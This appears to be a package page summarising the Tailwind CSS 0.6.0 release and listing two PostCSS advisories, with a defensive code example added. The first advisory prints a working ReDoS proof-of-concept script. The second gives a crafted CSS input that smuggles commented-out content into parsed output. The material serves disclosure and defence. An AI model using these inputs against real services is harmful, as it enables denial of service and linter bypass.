Tailwind CSS moved from version 0.5.3 to 0.6.0, a release that refines rather than reshapes this utility-first CSS framework. The core premise, rapidly building custom user interfaces, is unchanged, but several changes landed under the hood. The most visible one is in the dependencies: lodash was bumped from 4.17.4 to 4.17.5, a patch-level update indicating minor bug fixes or performance tweaks in the utility library, and a new dependency, css.escape, was added in 0.6.0, which implies improved handling of CSS escaping. Development dependencies are largely identical, but the published package itself changed noticeably. The dist metadata shows the packaging differences: the file count rose slightly, from 106 to 108, implying new files or a restructuring of existing ones, and the unpackedSize grew from 1473804 bytes to 2032401 bytes, a larger footprint that likely reflects new features, expanded utility classes, or more documentation bundled directly in the package. The update was released on 2018-06-21, a clear point of demarcation for developers considering an upgrade. Taken together, moving to 0.6.0 brings a range of small improvements and refinements.
All vulnerabilities affecting version 0.6.0 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Build a string holding n copies of the annotation prefix and no closing "*/",
// the input shape on which the vulnerable regex backtracks.
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Time parse() on inputs of growing length; on a vulnerable version the
// cost grows superlinearly with attack_str.length.
for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try {
            postcss.parse(attack_str)
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts PostCSS parses as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) even though they were originally inside a comment.
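Two pre-parse guards that follow from these two advisories, written here as an added example (not code from the advisories, from PostCSS or from Tailwind): a linear-time lookup of the sourceMappingURL annotation that cannot be driven into catastrophic backtracking, and line-ending normalisation so a lone \r is not read one way by PostCSS and another way by the consumer of its output. The function and constant names are my own, and the second sample input is constructed the same way as the advisory's build_attack() output.

```javascript
// Added defensive example; not code from the advisories or from PostCSS.
// The real fix for both advisories is upgrading PostCSS; this is defence in depth
// for code that must handle CSS from an untrusted source.
const MARKER = '# sourceMappingURL=';

// Find the annotation value (text between "/*<whitespace># sourceMappingURL="
// and the first "*/" on the same line) with indexOf scans instead of a
// backtracking regex, so the cost stays linear even when the input repeats
// the "/*# sourceMappingURL=" prefix thousands of times.
function findSourceMappingURL(css) {
  let pos = 0;
  let nextClose = -1; // cached index of the next "*/" found by the last search
  while ((pos = css.indexOf('/*', pos)) !== -1) {
    let i = pos + 2;
    while (i < css.length && /\s/.test(css[i])) i++; // optional whitespace
    if (!css.startsWith(MARKER, i)) { pos = i; continue; } // ordinary comment
    const valStart = i + MARKER.length;
    if (nextClose < valStart) nextClose = css.indexOf('*/', valStart);
    if (nextClose === -1) return null; // never closed: give up after one pass
    const nl = css.indexOf('\n', valStart);
    if (nl === -1 || nextClose < nl) return css.slice(valStart, nextClose).trim();
    // Closed only on a later line: every other marker on this line would fail
    // the same way, so skip the whole line rather than rescan it.
    pos = nl + 1;
  }
  return null;
}

// Map "\r\n" and lone "\r" to "\n" so PostCSS and whatever consumes its
// output agree on where lines, and therefore comments, begin and end.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, '\n');
}

// Constructed inputs: a normal annotation, an input shaped like the
// advisory's build_attack() output, and the \r sample from the second advisory.
const NORMAL_CSS = 'a{}/*# sourceMappingURL=a.css.map */';
const ATTACK_LIKE_CSS = 'a{}' + '/*# sourceMappingURL='.repeat(20000) + '!';
const CR_CSS = '@font-face{ font:(\r/*);}';

const t0 = Date.now();
console.log(findSourceMappingURL(NORMAL_CSS));      // a.css.map
console.log(findSourceMappingURL(ATTACK_LIKE_CSS)); // null
console.log(`scanned ${ATTACK_LIKE_CSS.length} chars in ${Date.now() - t0} ms`);
console.log(JSON.stringify(normalizeLineEndings(CR_CSS)));
```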